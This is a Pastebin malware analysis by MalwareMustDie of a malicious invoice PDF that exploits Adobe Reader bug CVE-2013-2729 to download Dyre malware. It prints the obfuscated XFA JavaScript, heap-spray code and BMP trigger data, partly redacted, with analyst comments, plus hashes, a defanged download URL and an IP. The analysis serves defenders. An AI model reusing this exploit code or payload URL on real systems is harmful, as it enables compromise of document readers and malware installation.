Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // #MalwareMustDie! ITW Campaign of Dyre Malware via Explopit CVE-2013-2729 PDF.
- // Exploitation: Adobe Reader X BMP/RLE heap corruption
- // CVE: CVE-2013-2729
- // thanks: @nickschroedl (to force me to wake up+analysing this) @SeraphimDomain (to help recognizing this new malware)
- // Tweets:
- https://twitter.com/nickschroedl/status/522412815265845248
- https://twitter.com/MalwareMustDie/status/522464893090684928
- https://twitter.com/SeraphimDomain/status/522464989957746689
- //-------------------------
- // Sample:
- //-------------------------
- MD5 : 536445d39de9f19947aa493c1ee57751
- SHA256 : 6b6fdc4b116802728ec763ac7b25472046465dd0cf58146b3755e7efcb83f135
- File size 465.6 KB ( 476741 bytes )
- // PDFiD
- This PDF document has an invalid cross reference table.
- This PDF document contains AcroForm objects. AcroForm Objects can
- specify and launch scripts or actions, that is why they are often
- abused by attackers.
- This PDF document has 1 page, please note that most malicious PDFs have
- only one page.
- This PDF document has 6 object start declarations and 6 object end
- declarations.
- This PDF document has 2 stream object start declarations and 2 stream
- object end declarations.
- This PDF document has a cross reference table (xref).
- This PDF document has a pointer to the cross reference table
- (startxref).
- This PDF document has a trailer dictionary containing entries allowing
- the cross reference table, and thus the file objects, to be read.
- // ExifTool
- MIMEType application/pdf
- FileCreateDate 2014:10:16 04:08:59+01:00
- FileType PDF
- Linearized No
- FileAccessDate 2014:10:16 04:08:59+01:00
- Warning Invalid xref table
- PDFVersion 1.7
- [wait.gif]
- // VT Metadata (ITW info)
- First submission 2014-10-15 13:31:37 UTC ( 13 hours, 38 minutes ago )
- Last submission 2014-10-16 03:08:49 UTC ( 1 minute ago )
- File names sample.pdf
- VIRUS_invoice621785.pdf
- invoice621785.pdf
- invoice621785.pdf
- invoice621785.pdf
- BAD-invoice621785.pdf
- 536445d39de9f19947aa493c1ee57751.pdf
- vti-rescan
- invoice621785.txt
- invoice621785 - Copy.pdf
- invoice621785.pdf
- file-7580290_pdf
- Virus-invoice621785.pdf
- vti-rescan
- invoice621785.txt
- invoice621785.txt
- invoice621785 - Copy.pdf
- invoice621785.pdf
- file-7580290_pdf
- Virus-invoice621785.pdf
- invoice621785.pdf
- invoice621785b.pdf
- invoice621785.pdf
- base64.pdf
- !!!!VIRUS!!!! invoice621785.pdf
- 1.invoice621785.pdf
- attch.pdf
- 536445d39de9f19947aa493c1ee57751
- invoice621785.pdf
- invoice621785.pdf
- 111111111.pdf
- invoice621785.pdf.malware
- // ---------------------------------------
- // Hostile script (Javascript detected)
- // Analysis is in comment with //MMD: xxxx
- // by @unixfreaxjp
- // ---------------------------------------
- <script name="im" contentType="application/x-javascript">
- // MMD: This part of script will trigger shellcode URLDownloadToCacheFileA
- var oxi = "";
- var JH = "";
- var VMeaD = function(a){return HqmB.call(a,a);};
- var Q5Bm = "";
- String.prototype.trim=function(){return this.replace(/^[\s\n\r\t]+|\s\n\r\t]+$/g, '');};
- function ymE4(zzz, sss, sdsds) {
- switch (zzz)
- {
- case 1:
- return AY(sss);
- break;
- case 2:
- return OnVk(sss, sdsds);
- break;
- case 3:
- return Muv0S(sss);
- break;
- case 4:
- return HIZx(sss);
- break;
- case 5:
- return xt4(sss);
- break;
- }
- }
- function EiBY(x){
- return Et(x);
- }
- function mG05X(n)
- {
- var w = form2.Text100.name;
- var s = [];
- n = n.trim();
- var m = cMZ(Bu4g8);
- m = cMZ(oCnr);
- var ar = cMZ("[" + m + "]");
- var tt = (w.length > 3) ? 1 : 2;
- for (var i = 0; i < ar.length; i ++)
- {
- var a = ar[i];
- var b = (tt == 1) ? 0x33 : 0x40;
- var j = ( a & ~b ) | ( ~a & b );
- if ((j >= 33) && (j <= 126))
- {
- s[i] = String.fromCharCode(33 + ((j + 14) % 94));
- }
- else
- {
- s[i] = String.fromCharCode(j);
- }
- }
- return s.join('');
- }
- function a2c(a)
- {
- ter="";
- for (var i in a)
- ter+= String.fromCharCode(a[i]);
- return ter;
- }
- function HqmB(a, b, c, d){
- var x = form2.Text100.name;
- var y = this[a];
- x = x + '3';
- return y;
- }
- function parOM(aaa) {
- var ret;
- var w = form2.Text100.name;
- var tt = (w.length > 3) ? 1 : 2;
- ret = (tt == 1) ? VMeaD(aaa) : null;
- return ret;
- }
- var ma = "5t5in55f5o55har5o5ee5a5u5es5a5e";
- var upd = "Srg.rmCCdvlncp";
- var upd0 = "";
- var ii = 0;
- for (var i=0; i < ma.length; i++)
- {
- if(ma[i] != "5")
- upd0 += ma[i];
- else
- upd0 += upd[ii++];
- }
- var cMZ = parOM(upd0.slice(19,23));
- var VUSO = cMZ(upd0.slice(23));
- var ge = [0x33, 0x77, 0x6A, 0x75, 0x71, 0x66, 0x68, 0x6A];
- var z3 = [0x5C, 0x64, 0x5D, 0x2F, 0x67, 0x2C, 0x27, 0x27, 0x29];
- var z4 = [0x5D, 0x2F, 0x67, 0x2C, 0x27, 0x2C, 0x27, 0x29];
- var z1 = [0x28, 0x2F, 0x5B, 0x5E, 0x5C, 0x78, 0x32, 0x46];
- for(var q = 0; q < ge.length; q++)
- Q5Bm += String.fromCharCode(ge[q]-5);
- var z2 = [0x28, 0x2F, 0x5B, 0x5C, 0x78, 0x32, 0x46];
- var Bu4g8 = "n" + Q5Bm + a2c(z1) + a2c(z3);
- var oCnr = "m" + Q5Bm + a2c(z2) + a2c(z4);
- cMZ(mG05X(xfa.resolveNode("Text101").rawValue)); // MMD: draw za BMP as raw!
- </script>
- <script name="i3d" contentType="application/x-javascript">
- var D4W=0x12e; // MMD: These are var & arrays to be used in HeapSpray
- var Ibv2 = 200;
- var of4 = 0;
- var KsK = new Array(Ibv2);
- var xS = new Array(Ibv2);
- var URP = new Array(Ibv2);
- var cVqW = new Array(Ibv2/2);
- </script>
- <?templateDesigner expand 1?>
- </variables>
- <subform w="576pt" h="756pt">
- <field name="Image301">
- <ui> <imageEdit/> </ui>
- <value>
- <image1>
- /*soxidoxiVYzoxiyGUaTfdjgpaoejgkldfjgibdialzoaerkgjoxiVYzo
- xiyGUaTkadfjguikdertgsdflahegkfgjgk56ujhghdfghgfkfhkdertgs
- dflahegklsdkfbdialzfgjgk56ujhghdfghgfkfhkdertgsdflahegklsdkfbdialzfgjgk56ujhghdfghg
- fkfhkdertgsdflahegklsdkfbdialzlsdoxiVYzoxiyGUaTkfbdialzaoejgkldfjgibdialzoaerkgjkad
- fjguikdertgsdflahegkfgjgk56ujhghdfghgfkfhkdertgsdflahegklsdkfbdialzfgjgk56ujhghdfgh
- gfkfhkdertgsdflahegklsdkfbdialzfgjgk56ujhghdfghgfkfhkdertgsdflahegklsdkfbdialzlsdkf
- bdialzigoushjbnklcnbluaerhtgjsbdialzfdjgpaoejgkldfjgibdialzoaerkgjkadfjkdertgsdflah
- egkfgjgk56ujhghdfghgfkfhkdertgsdflahegklsdkfbdialzfgjgk56ujhghdfghgfkfhkdertgsdflah
- egklsdkfbdialzfgjgk56ujhialzlsdkfbdialzigoushjbnklcnbluaeoxiVYzoxiyGUaTrhtgjsbdialz
- fdjgpaoejgkldfjgibdialzoaerkgjkadfjkdertgsdflahegkfgjgk56ujhghdfghgfkfhkdertgsdflah
- (...)
- jeyrhgjkdfgdfg*/
- </image1>
- <image2>
- /*soxidoxiVYzoxiyGUaTfdjgpaoejgkldfjgibdialzoaerkgj
- hdfghgfkfhkdertgsdflahegklsdkfbdialzfgjgk56ujhghdfghgfkfhkdertgsdflahegkoxiVYzoxiyG
- UaToxiVYzoxiyGUaToxiVYzoxiyGUaToxiVYzoxiyGUaToxiVYzoxiyGUaToxiVYzoxiyGUaToxiVYzoxiy
- GUaToxiVYzoxiyGUaToxiVYzoxiyGUaToxiVYzoxiyGUaToxiVYzoxiyGUaToxiVYzoxiyGUaTlsdkfbdia
- lzlsdkfbdialzigoushjbnklcnbluaerhtgjsbdialzfdjgpaoejgkldfjgibdialzoaerkgjkadfjeyrhg
- (...)
- jkdfgdfg*/
- </image2>
- <image>
- Qk0AAAAACgAUAAAAAABAAAAALgEAAAEAAAABAAgAAQAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAUkdC
- QVJHQkEAAv8AAAL/AAAC/wAAAv8AAAL/AAAC/wAAAv8AAAL/AAAC/wAAAv8AAAL/AAAC/wAAAv8A
- AAL/AAAC/wAAAv8AAAL/AAAC/wAAAv8AAAL/AAAC/wAAAv8AAAL/AAAC/wAAAv8AAAL/AAAC/wAA
- Av8AAAL/AAAC/wAAAv8AAAL/AAAC/wAAAv8AAAL/AAAC/wAAAv8AAAL/AAAC/wAAAv8AAAL/AAAC
- (...)
- /AAAC/wAAAv8AAAL/AAAC/wAAAv8AAAL/AAAC/wAAAv8A
- AAL/AAAC/wAAAv8AAAL/AAAC/wAAAv8AAAL/AAAC/wAAAvgAAAgBAAAAAAAnBQACAKsAAgCrAAIA
- qwACAKsAAgCrAAIAqwACAKsAAgCrAAIAqwACAKsACkxMTExMTExMTEw=
- </image>
- </value>
- </field>
- </subform>
- <event activity="initialize" name="s9"> // MMD: The initiated of this exploit
- <script contentType="application/x-javascript">
- // MMD: Known exploit: Adobe Reader X 10.1.4.38 - BMP/RLE Heap Corruption
- var i; var j; // MMD: prep memory layout
- if (i3d.of4 == 0){
- var VYz = "\u5858\u5858\u5678\u1234"; // MMD: Trigger usage of LFH
- var yGUaT = i3d.D4W/2-1-(VYz.length+2+2);
- for (i=0; i < i3d.Ibv2; i+=1) // MMD: HEAP SPRAY starts here...
- i3d.KsK[i] = VYz + im.ymE4(1,i) +
- im.oxi.substring(0, yGUaT) +
- im.ymE4(1,i) + "";
- for (j=0; j < 1000; j++)
- for (i=i3d.Ibv2-1; i > i3d.Ibv2/4; i-=10)
- i3d.KsK[i]=null;
- i3d.of4 = 1;
- }
- </script>
- </event>
- <draw name="Text101" y="6.35mm" x="15.875mm" w="7.375in" h="254mm"> // MMD: BMP dats..
- <ui>
- <textEdit/>
- </ui>
- <value>
- <text>
- nAB57/Vaod57/ASto19/MqbD19/ibPf19/dUaq19/bsX19/hZqj19/djwh19/sJU19/ciQ74/
- wiM68/CyA19/gjVQ95/TAY19/BkG98/hzj30/uPDm117/Onw108/tiEi86/oKIU5/hqE0/JhYZ30/
- usK117/YIm108/Bhdo108/MaNB108/PFDn108/JbOL30/CGMs117/VWMI108/yzhj108/yhQB108/xNM108/CjlK30/
- oUh117/kZl108/vTFa87/Hhv5/KqKY0/lntm30/OupY117/wKf4/Qtm91/fpK5/vrE84/zAMl30/
- zwXA117/Uogl4/qar4/tnt4/Rasi4/afD30/voQK117/Egym87/SQPT1/AkT4/aUb4/DPvN30/
- // REDACTED //
- Yxyf19/neFH19/RKma19/LHyB19/OEGp19/Ehz19/Zbg112/IBKF5/xBm118/WEX117/aMe112/nnN12/
- NHo19/Weo108/MqI122/SlHY81/mPpX108/sExj81/skCl108/fiNA81/IEM108/wBv81/ajgZ108/HxeO105/
- svCP108/wiY122/jDB83/NDq83/IFD83/zmd83/egCw83/inu83/FMI83/jGm83/lns89/qBNI57/
- OYo19/EmDw19/aMTN19/IBY19/JrIr19/MYaP19/bCb19/rDP19/YxT19/LcEi19/TMLx19/RbB19/
- cWW125/quOE57
- </text>
- </value>
- <font typeface="Myriad Pro"/>
- <margin topInset="0.5mm" bottomInset="0.5mm" leftInset="0.5mm" rightInset="0.5mm"/>
- </draw>
- <draw name="Text102" y="6.35mm" x="15.875mm" w="7.375in" h="254mm"> // MMD: BMP dats...
- <ui>
- <textEdit/>
- </ui>
- <value>
- <text>
- HdGi57/SVEQ19/bHL19/IEzq19/EzZ19/dRa19/Mub19/WPhU19/Vlq19/VYc19/volf19/
- Dsb19/lhR19/WFD116/lIYx1/FpDd112/lKte19/gMJ9/tcqB89/Xsv19/yMHX116/Shc1/VKU112/
- RIW19/xIfM8/NVpN89/WAwg57/YMaE57/QZUu19/cVw19/gmwi19/tmX19/lrD19/FTO19/LDW19/
- PYqG19/UjjX19/usBd19/AnCr19/OUN19/fsfs116/EQdz1/nJaF112/vOaF19/IIh69/aUCU85/FkBB19/
- XMU95/eWm19/tSCt111/OvPr83/ebSW89/lZp57/GPK19/Agx19/YijV19/DHP19/vYA19/HwHC19/
- // REDACTED //
- iOIW125/tmL89/kmi57/ixHF19/tlc19/udz19/tywc19/xuvx19/QURZ19/jzM19/gYAV19/wOlg19/
- qMoN19/tADX19/kKlU19/Bqe5/dtnQ116/tux5/aoud12/ZBy118/qsj110/FWr118/FPew1/KlL112/
- rXA11/aHLY5/dwa118/lce110/Sxz7/icC14/HdnR115/Eegv119/aAry5/bFE64/MBpo115/nzsy7/
- hTK100/REHt118/RFCP112/MvS117/sjLK5/hmK107/QTw89/lcHy57
- </text>
- </value>
- <font typeface="Myriad Pro"/>
- <margin topInset="0.5mm" bottomInset="0.5mm" leftInset="0.5mm" rightInset="0.5mm"/>
- </draw>
- // MMD: form layout is rendered and the bug triggered
- <event activity="docReady" ref="$host" name="EVde">
- <script contentType="application/x-javascript"> // MMD: runs once the page ready
- im.cMZ(im.mG05X(xfa.resolveNode("Text102").rawValue)); // MMD: draw za raw!
- </script>
- </event>
- </subform>
- <?originalXFAVersion http://www.xfa.org/schema/xfa-template/2.5/?>
- <?templateDesigner DefaultLanguage JavaScript?>
- <?templateDesigner DefaultRunAt client?>
- <?acrobat JavaScript strictScoping?>
- <?PDFPrintOptions embedViewerPrefs 0?>
- <?PDFPrintOptions embedPrintOnFormOpen 0?>
- <?PDFPrintOptions scalingPrefs 0?>
- <?PDFPrintOptions enforceScalingPrefs 0?>
- <?PDFPrintOptions paperSource 0?>
- <?PDFPrintOptions duplexMode 0?>
- <?templateDesigner DefaultPreviewType interactive?>
- <?templateDesigner DefaultPreviewPagination simplex?>
- <?templateDesigner XDPPreviewFormat 19?>
- <?templateDesigner DefaultCaptionFontSettings face:Myriad Pro;size:10;weight:normal;style:normal?>
- <?templateDesigner DefaultValueFontSettings face:Myriad Pro;size:10;weight:normal;style:normal?>
- <?templateDesigner Zoom 119?>
- <?templateDesigner FormTargetVersion 30?>
- <?templateDesigner SaveTaggedPDF 1?>
- <?templateDesigner SavePDFWithEmbeddedFonts 1?>
- <?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?></template>
- <config xmlns="http://www.xfa.org/schema/xci/3.0/">
- <agent name="designer">
- <!-- [0..n] -->
- <destination>pdf</destination>
- <pdf>
- <!-- [0..n] -->
- <fontInfo/>
- </pdf>
- </agent>
- <present>
- <!-- [0..n] -->
- <pdf>
- <!-- [0..n] -->
- <version>1.7</version>
- <adobeExtensionLevel>5</adobeExtensionLevel>
- </pdf>
- <common/>
- <xdp>
- <packets>*</packets>
- </xdp>
- </present>
- </config>
- <localeSet xmlns="http://www.xfa.org/schema/xfa-locale-set/2.7/">
- <locale name="en_US" desc="English (United States)">
- <calendarSymbols name="gregorian">
- <monthNames>
- <month>January</month>
- <month>February</month>
- <month>March</month>
- <month>April</month>
- <month>May</month>
- <month>June</month>
- <month>July</month>
- <month>August</month>
- <month>September</month>
- <month>October</month>
- <month>November</month>
- <month>December</month>
- </monthNames>
- <monthNames abbr="1">
- <month>Jan</month>
- <month>Feb</month>
- <month>Mar</month>
- <month>Apr</month>
- <month>May</month>
- <month>Jun</month>
- <month>Jul</month>
- <month>Aug</month>
- <month>Sep</month>
- <month>Oct</month>
- <month>Nov</month>
- <month>Dec</month>
- </monthNames>
- <dayNames>
- <day>Sunday</day>
- <day>Monday</day>
- <day>Tuesday</day>
- <day>Wednesday</day>
- <day>Thursday</day>
- <day>Friday</day>
- <day>Saturday</day>
- </dayNames>
- <dayNames abbr="1">
- <day>Sun</day>
- <day>Mon</day>
- <day>Tue</day>
- <day>Wed</day>
- <day>Thu</day>
- <day>Fri</day>
- <day>Sat</day>
- </dayNames>
- <meridiemNames>
- <meridiem>AM</meridiem>
- <meridiem>PM</meridiem>
- </meridiemNames>
- <eraNames>
- <era>BC</era>
- <era>AD</era>
- </eraNames>
- </calendarSymbols>
- <datePatterns>
- <datePattern name="full">EEEE, MMMM D, YYYY</datePattern>
- <datePattern name="long">MMMM D, YYYY</datePattern>
- <datePattern name="med">MMM D, YYYY</datePattern>
- <datePattern name="short">M/D/YY</datePattern>
- </datePatterns>
- <timePatterns>
- <timePattern name="full">h:MM:SS A Z</timePattern>
- <timePattern name="long">h:MM:SS A Z</timePattern>
- <timePattern name="med">h:MM:SS A</timePattern>
- <timePattern name="short">h:MM A</timePattern>
- </timePatterns>
- <dateTimeSymbols>GyMdkHmsSEDFwWahKzZ</dateTimeSymbols>
- <numberPatterns>
- <numberPattern name="numeric">z,zz9.zzz</numberPattern>
- <numberPattern name="currency">$z,zz9.99|($z,zz9.99)</numberPattern>
- <numberPattern name="percent">z,zz9%</numberPattern>
- </numberPatterns>
- <numberSymbols>
- <numberSymbol name="decimal">.</numberSymbol>
- <numberSymbol name="grouping">,</numberSymbol>
- <numberSymbol name="percent">%</numberSymbol>
- <numberSymbol name="minus">-</numberSymbol>
- <numberSymbol name="zero">0</numberSymbol>
- </numberSymbols>
- <currencySymbols>
- <currencySymbol name="symbol">$</currencySymbol>
- <currencySymbol name="isoname">USD</currencySymbol>
- <currencySymbol name="decimal">.</currencySymbol>
- </currencySymbols>
- <typefaces>
- <typeface name="Myriad Pro"/>
- <typeface name="Minion Pro"/>
- <typeface name="Courier Std"/>
- <typeface name="Adobe Pi Std"/>
- <typeface name="Adobe Hebrew"/>
- <typeface name="Adobe Arabic"/>
- <typeface name="Adobe Thai"/>
- <typeface name="Kozuka Gothic Pro-VI M"/>
- <typeface name="Kozuka Mincho Pro-VI R"/>
- <typeface name="Adobe Ming Std L"/>
- <typeface name="Adobe Song Std L"/>
- <typeface name="Adobe Myungjo Std M"/>
- </typefaces>
- </locale>
- <?originalXFAVersion http://www.xfa.org/schema/xfa-locale-set/2.1/?></localeSet>
- <xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
- <xfa:data xfa:dataNode="dataGroup"/>
- </xfa:datasets>
- <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.2-c001 63.139439, 2011/06/07-10:39:26 ">
- <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
- <rdf:Description xmlns:xmp="http://ns.adobe.com/xap/1.0/" rdf:about="">
- <xmp:MetadataDate>2014-08-20T20:14:14Z</xmp:MetadataDate>
- <xmp:CreatorTool>Adobe LiveCycle Designer 11.0</xmp:CreatorTool>
- </rdf:Description>
- <rdf:Description xmlns:pdf="http://ns.adobe.com/pdf/1.3/" rdf:about="">
- <pdf:Producer>Adobe LiveCycle Designer 11.0</pdf:Producer>
- </rdf:Description>
- <rdf:Description xmlns:desc="http://ns.adobe.com/xfa/promoted-desc/" rdf:about="">
- <desc:version rdf:parseType="Resource">
- <rdf:value>11.0.0.20130303.1.892433.887364</rdf:value>
- <desc:ref>/template/subform[1]</desc:ref>
- </desc:version>
- </rdf:Description>
- </rdf:RDF>
- </x:xmpmeta>
- <xfdf xmlns="http://ns.adobe.com/xfdf/" xml:space="preserve">
- <annots/>
- </xfdf></xdp:xdp>
- // Exploit: CVE-2013-2729
- //details:
- [quoted] Integer overflow in Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-2727. [/quoted]
- [quoted] The issue presented on this CVE is related to the parsing of a BMP file compressed with RLE8.
- The bug is triggered when Adobe Reader parses a BMP RLE encoded file embedded in an interactive
- PDF form. The dll responsible of handling the embedded XFA interactive forms(and the BMP) is
- the AcroForm.api plugin. So in order to get to the bug we first need to reach the XFA code. [/quoted]
- [quoted] The XML Forms Architecture (XFA) provides a template-based grammar and a set of processing rules
- allow business to build interactive forms. At its simplest, a template-based grammar defines fields
- in which a user provides data. Among others it defines buttons, textfields, choicelists, images and
- a scripting API to validate the data and interact. It supports Javascript, XSLT an FormCalc
- as scripting language. One can build a PDF containing a XFA Form containing an image [/quoted]
- Ref: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2729
- // Hostile URL post exploit:
- Malicious API download executed: \KnownDlls\NTMARTA.DLL origin: URLDownloadToCacheFileA
- h00p://rlmclahore.com/resources/search/1510out.exe
- Network: 70.34.33.140|static-ip-70-34-33-140.net-70-34-33-0.rdns.managed.com.|40561 | 70.34.32.0/21 | MOBILENOW | US | POWERDNN.COM | POWER DNN
- // PoC download will be executed per browser/PDF env
- https://lh6.googleusercontent.com/-qYEkGH0sWio/VD88vayVXCI/AAAAAAAARZ0/t6UkaJYv32E/s747/003.png
- Payload: Dyre
- https://www.virustotal.com/en/file/3f23306c3b94fc2d594836e972e32f2cc4a19787ed3d561dc0bfe52970798f70/analysis/
- // ---
- // MalwareMustDie!
Add Comment
Please, Sign In to add comment